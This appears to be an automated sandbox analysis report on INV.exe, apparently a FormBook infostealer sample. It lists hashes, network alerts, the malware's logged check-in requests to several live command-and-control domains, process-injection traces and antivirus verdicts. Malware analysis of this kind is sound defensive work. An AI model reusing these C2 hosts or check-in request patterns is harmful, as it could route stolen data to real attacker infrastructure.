Summary | ZeroBOX

INV.exe

UPX Malicious Library PE32 PE File
Category Machine Started Completed
FILE s1_win7_x6403_us Jan. 28, 2023, 10:49 p.m. Jan. 28, 2023, 11:02 p.m.
Size 351.3KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 f5ba8cd2153faf89a84faceabd8c8a50
SHA256 d004812639335fc21774851e271241aaead5918a69f978e1aedb6b573b6cca1b
CRC32 D477F9EA
ssdeep 6144:zYa6TIDW7dny8QOUiUK66kWsXlIO+8EJkcln1e5bVaVZlJcG8U:zYKDWA8QOiK65yO+TJkcln1ApSZT9/
Yara
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 2.57.90.16:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 143.92.48.236:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49183 -> 66.96.147.160:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 66.112.211.168:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 211.149.132.144:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49186 -> 162.0.216.254:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 217.70.184.50:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49189 -> 199.59.243.222:80 2031413 ET MALWARE FormBook CnC Checkin (POST) M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 211.149.132.144:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 211.149.132.144:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 211.149.132.144:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.112.211.168:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.112.211.168:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.112.211.168:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 2.57.90.16:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 2.57.90.16:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 2.57.90.16:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 143.92.48.236:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 143.92.48.236:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 143.92.48.236:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49185 -> 66.96.147.160:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49185 -> 66.96.147.160:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49185 -> 66.96.147.160:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49188 -> 162.0.216.254:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 199.59.243.222:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49188 -> 162.0.216.254:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 199.59.243.222:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49188 -> 162.0.216.254:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 199.59.243.222:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 217.70.184.50:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 217.70.184.50:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 217.70.184.50:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49191 -> 199.59.243.222:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49191 -> 199.59.243.222:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49191 -> 199.59.243.222:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.bts-exhibition20.com/gbhu/?dwq11ePF=tpqPZatFSWftMZbuFeOnBOSwBNRYNC4bECF+5KuudrHZL+uj6SAhnLM79xl9TgWodfNUMHSE7zon0vuCBBc1ktEpBF17jxL0iiyPMLM=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.actualabaule.com/gbhu/?dwq11ePF=2pxLiO942t5FkFRjNHyAiMW5bHO63rkjCdflxXdQmiqtiPUBqVrUFlO8JTqg/bEqxMzFYZexGJrShELInTuzWAoQXV3U24qzi0sYkgA=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.govcintria.online/gbhu/?dwq11ePF=dVbA+IXcm1YuOJ1N0YfoPOUPspwoFrMI8eGyv/hTd7M6maCfXa3GNmu+O7MNTYOdhYiwJPdemCWc8/TOWhgps6HIHGnlIWhMsDwJ9t4=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.49138.net/gbhu/?dwq11ePF=WL2v/sGFsFIuAk53tX4v3ozaI9MekZ54iiHcVmD4RVE9irnVRUhCIdhzHcX9OStZFhWObZgZr940JPQfa5eUhFHz/csG7i5yqe9ZH20=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.dongshi88.com/gbhu/?dwq11ePF=b1ijv7/tEC2PXjxDsbuxsXva2wZ3D1czsA+lhOYVJxZEUWwbEdFBMQFsyzcPw/mr8NXL74lT/Fd9q4Dp8JhY/9JDjuMN4js97XFbSws=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.adalexs.com/gbhu/?dwq11ePF=D1b/tXE1wqN7p4mfTi76DPsviRaFjnrtscBWiPbYkZ2JHeEtyHLUC4ibH92W8gaDc10nQ7RDCV1MC1LMji13NdslOWFcPJvVlGENFow=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.bobblehead8.com/gbhu/?dwq11ePF=meqTUx5kIEeA9O3K+DspA+9TJQ7rWtYm9pdGl178RL9fSiIP48l7cIqKAbR6uI16zGzDWzC2kHM4w1/jD5NrA8QTbIMv2qGMhL2x80Q=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.bordain.website/gbhu/?dwq11ePF=Z0JOfegcJus8QT/ga7HhKsxVghDCE41qFhckdElZvPNE+U6wFU3FpNVOM7LfjIcK+KFXTjs52Dx2xmlkwnBEWQpZ+ijccONCTZsjAaQ=&YabdMo=eHFLyxLS9HiIq
suspicious_features GET method with no useragent header suspicious_request GET http://www.defituesday.com/gbhu/?dwq11ePF=K8gb+vg3lIj7mLsgY2s/Un2w4+nCuuuuWVhNes+vUVynttvh63W50QdwpB+jXhqV1vb6jBT4NlQZn884uDSkCA0C7jdkyYeP3Sv4iJE=&YabdMo=eHFLyxLS9HiIq
request GET http://www.bts-exhibition20.com/gbhu/?dwq11ePF=tpqPZatFSWftMZbuFeOnBOSwBNRYNC4bECF+5KuudrHZL+uj6SAhnLM79xl9TgWodfNUMHSE7zon0vuCBBc1ktEpBF17jxL0iiyPMLM=&YabdMo=eHFLyxLS9HiIq
request GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3390000.zip
request POST http://www.actualabaule.com/gbhu/
request GET http://www.actualabaule.com/gbhu/?dwq11ePF=2pxLiO942t5FkFRjNHyAiMW5bHO63rkjCdflxXdQmiqtiPUBqVrUFlO8JTqg/bEqxMzFYZexGJrShELInTuzWAoQXV3U24qzi0sYkgA=&YabdMo=eHFLyxLS9HiIq
request POST http://www.govcintria.online/gbhu/
request GET http://www.govcintria.online/gbhu/?dwq11ePF=dVbA+IXcm1YuOJ1N0YfoPOUPspwoFrMI8eGyv/hTd7M6maCfXa3GNmu+O7MNTYOdhYiwJPdemCWc8/TOWhgps6HIHGnlIWhMsDwJ9t4=&YabdMo=eHFLyxLS9HiIq
request POST http://www.49138.net/gbhu/
request GET http://www.49138.net/gbhu/?dwq11ePF=WL2v/sGFsFIuAk53tX4v3ozaI9MekZ54iiHcVmD4RVE9irnVRUhCIdhzHcX9OStZFhWObZgZr940JPQfa5eUhFHz/csG7i5yqe9ZH20=&YabdMo=eHFLyxLS9HiIq
request POST http://www.dongshi88.com/gbhu/
request GET http://www.dongshi88.com/gbhu/?dwq11ePF=b1ijv7/tEC2PXjxDsbuxsXva2wZ3D1czsA+lhOYVJxZEUWwbEdFBMQFsyzcPw/mr8NXL74lT/Fd9q4Dp8JhY/9JDjuMN4js97XFbSws=&YabdMo=eHFLyxLS9HiIq
request POST http://www.adalexs.com/gbhu/
request GET http://www.adalexs.com/gbhu/?dwq11ePF=D1b/tXE1wqN7p4mfTi76DPsviRaFjnrtscBWiPbYkZ2JHeEtyHLUC4ibH92W8gaDc10nQ7RDCV1MC1LMji13NdslOWFcPJvVlGENFow=&YabdMo=eHFLyxLS9HiIq
request POST http://www.bobblehead8.com/gbhu/
request GET http://www.bobblehead8.com/gbhu/?dwq11ePF=meqTUx5kIEeA9O3K+DspA+9TJQ7rWtYm9pdGl178RL9fSiIP48l7cIqKAbR6uI16zGzDWzC2kHM4w1/jD5NrA8QTbIMv2qGMhL2x80Q=&YabdMo=eHFLyxLS9HiIq
request POST http://www.bordain.website/gbhu/
request GET http://www.bordain.website/gbhu/?dwq11ePF=Z0JOfegcJus8QT/ga7HhKsxVghDCE41qFhckdElZvPNE+U6wFU3FpNVOM7LfjIcK+KFXTjs52Dx2xmlkwnBEWQpZ+ijccONCTZsjAaQ=&YabdMo=eHFLyxLS9HiIq
request POST http://www.defituesday.com/gbhu/
request GET http://www.defituesday.com/gbhu/?dwq11ePF=K8gb+vg3lIj7mLsgY2s/Un2w4+nCuuuuWVhNes+vUVynttvh63W50QdwpB+jXhqV1vb6jBT4NlQZn884uDSkCA0C7jdkyYeP3Sv4iJE=&YabdMo=eHFLyxLS9HiIq
request POST http://www.actualabaule.com/gbhu/
request POST http://www.govcintria.online/gbhu/
request POST http://www.49138.net/gbhu/
request POST http://www.dongshi88.com/gbhu/
request POST http://www.adalexs.com/gbhu/
request POST http://www.bobblehead8.com/gbhu/
request POST http://www.bordain.website/gbhu/
request POST http://www.defituesday.com/gbhu/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2128
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00470000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2128
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00480000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\nucctjtro.exe
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 104.21.76.77
Process injection Process 2128 called NtSetContextThread to modify thread in remote process 2220
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4199136
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000e8
process_identifier: 2220
1 0 0
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.65205746
FireEye Generic.mg.f5ba8cd2153faf89
McAfee RDN/Generic.dx
Cylance Unsafe
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/Redcap.e666870d
Cybereason malicious.2941bb
Arcabit Trojan.Generic.D3E2F5F2
Cyren W32/ABRisk.DRNF-3156
Symantec Packed.NSISPacker!g14
ESET-NOD32 a variant of Win32/Injector_AGen.QG
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.65205746
Avast Win32:InjectorX-gen [Trj]
Sophos Mal/Generic-S
F-Secure Trojan.TR/Redcap.iqtst
DrWeb Trojan.Loader.1278
VIPRE Trojan.GenericKD.65205746
McAfee-GW-Edition BehavesLike.Win32.Dropper.fc
Emsisoft Trojan.GenericKD.65205746 (B)
SentinelOne Static AI - Suspicious PE
Webroot W32.Trojan.GenKD
Google Detected
Avira TR/AD.GenShell.qwxpn
MAX malware (ai score=88)
Antiy-AVL Trojan/Win32.Formbook
Gridinsoft Trojan.Win32.Downloader.sa
Microsoft Trojan:Win32/Casdet!rfn
ZoneAlarm HEUR:Trojan-Spy.Win32.Noon.gen
GData Trojan.GenericKD.65205746
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.NSISInject.R495658
Acronis suspicious
BitDefenderTheta Gen:NN.ZexaF.36212.fqW@aGhmtkei
ALYac Gen:Variant.Lazy.263633
Malwarebytes Trojan.Injector
TrendMicro-HouseCall TROJ_GEN.R002H0DAR23
Rising Trojan.Injector!8.C4 (TFE:5:4WZSEkuvkMG)
Ikarus Trojan.Inject
Fortinet W32/Injector_AGen.QG!tr
AVG Win32:InjectorX-gen [Trj]
Panda Trj/GdSda.A